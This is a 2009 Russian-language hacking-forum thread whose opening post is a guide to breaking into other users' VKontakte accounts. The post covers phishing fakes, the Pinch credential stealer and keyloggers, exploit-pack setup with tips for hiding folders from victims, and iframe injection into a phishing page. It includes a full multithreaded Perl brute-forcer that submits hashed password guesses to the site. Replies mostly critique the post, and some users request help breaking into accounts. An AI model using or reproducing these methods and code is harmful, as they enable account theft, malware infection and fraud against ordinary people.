Взлом акаунта Vkontakte.ru
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом акаунта Vkontakte.ru - 2009-11-14 22:02:39.433333
|
|
|
Nagato_PAIN
Сообщений: -4
Оценки: 0
Присоединился: 2009-11-13 15:27:21.973333
|
Привет всем!!!
В этой статье я хочу рассказате несколько способов взлома анкеты VKONTAKTE.RU:
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум с десяток методов взлома почты.Хотя есть один минус, если пароль "корявый", он разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает "левый" вид, и соответственно не работает. И поэтому на нём мы останавливаться не будем.
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд)
Для тех кто не знает:
Фэйк-подделка, фальсификация, обман; как правило, используется для определения изменённых (приукрашенных, искажённых) с помощью специальных программ-редакторов оригинальных цифровых фото или видео файлов.(определение взято с http://forum.xakep.ru/m_1429138/printable.htm)
3)Троян.Эту категорию мы разделим:
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил pinch- здесь лежит билдер пинча, а здесь парсер parser.
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100% в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо) Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777 Скачать 3 связки можно по ссылке здесь- здесь лежат мпак, айспак и армитаж ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало…Папку в которой будет лежать сплоит, тоже переиминуйте на что-нить типа myphotos и тд… тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT…лишнее палево ни к чему… Идем дальше… Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был. Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он будет лежать в папке load под именем file. Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV) Для этого брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw…ctiveperl.html либо по ссылке http://www.denwer.ru/packages/perl.html
Код брутфорсера:
quote:
#!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; open (pass, "<$dic"); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; }
Не забудьте сменить разширение на brut.pl $dic = ‘passl.txt’; #паслист для брдутфорсера $id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы) $mail = ‘мыло’; #мыло, значек @ меняем на %40 $threads = Х; # где Х - количество потоков Если вам лень копаться со всем этим, то есть неплохой брут на С.
Скачать его можно по ссылке здесь, сразу говорю, если не запускается - это ваши проблемы, ибо все прекрасно работает!
5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe… Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на ссылке комбинированная атака на мозг(фейк) и браузер(код iframe).
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-14 22:19:29.760000
|
|
|
Zevs91207
Сообщений: 1315
Оценки: 0
Присоединился: 2007-12-09 20:35:12.953333
|
Первое впечатление: статья написана коряво,ничего толком не объяснил общие фразы:"ничего сложного",и подобное.
Общее описание способов взлома и мало конкретики,да самый лучший способ по моему мнению–фейк,он пожалуй, не зависит не от чего, разве что от наивости жертвы.
Но об этом уже писали:
http://forum.xakep.ru/fb.aspx?m=1599499
http://forum.xakep.ru/fb.aspx?m=1605599
Ты же обошелся малым,ничего подробного,посмотрите прикреплённые топики этой ветки,там больше иформациии на этот счёт .
Nagato_PAIN НЕ прими в обиду на ты наспех писал свою статью.
Я постарался выделить минусы более конструктивно.
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-14 22:25:38.043333
|
|
|
Nagato_PAIN
Сообщений: -4
Оценки: 0
Присоединился: 2009-11-13 15:27:21.973333
|
quote:
Nagato_PAIN НЕ прими в обиду на ты наспех писал свою статью.
да на спех,но мне показалась она довольно информативной,ну лан судить не мне)))
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-15 12:42:34.210000
|
|
|
eragon47
Сообщений: 6
Оценки: 0
Присоединился: 2009-11-15 12:12:26.870000
|
можеш помочь взломать акк?
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-15 12:46:02.643333
|
|
|
Pauel
Сообщений: 44
Оценки: 0
Присоединился: 2009-01-25 18:08:18.793333
|
мда….. немного полезная статейка…
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-15 13:14:49.373333
|
|
|
Nagato_PAIN
Сообщений: -4
Оценки: 0
Присоединился: 2009-11-13 15:27:21.973333
|
quote:
можеш помочь взломать акк?
это кому был вопрос???
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-17 00:00:37.030000
|
|
|
Вася177Ymnik
Сообщений: 7
Оценки: 0
Присоединился: 2009-11-16 22:18:21.450000
|
пишите все конечно хорошо, ну а кто реально может подобрать пароль вконтакте???? я уже неделю пытаюсь по вашим способам не выходит! в ЛС плиз кто сможет чем то помочь)))
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-17 14:18:50.883333
|
|
|
w2den777
Сообщений: 25
Оценки: 0
Присоединился: 2009-11-09 19:19:24.300000
|
Хорошая статья, поскольку ориентирована на новичков, сделай чуть подробнее
|
|
|
|
|
RE: Взлом акаунта Vkontakte.ru - 2009-11-17 20:41:30.806666
|
|
|
Fighter48
Сообщений: 27
Оценки: 0
Присоединился: 2009-11-15 22:55:25.180000
|
почитал сделал вывод-единственный возможный способ это троян)) брут-пока дождешься сдохнешь,фейк-ну если у тебя есть талант впаривания и убеждения, и причем надо кидать ссылку не через контакт!!так как контакт блокирует такие сайты) про почту-вообще не понял)почту сначало взломай)))
|
|
|
|
|
|
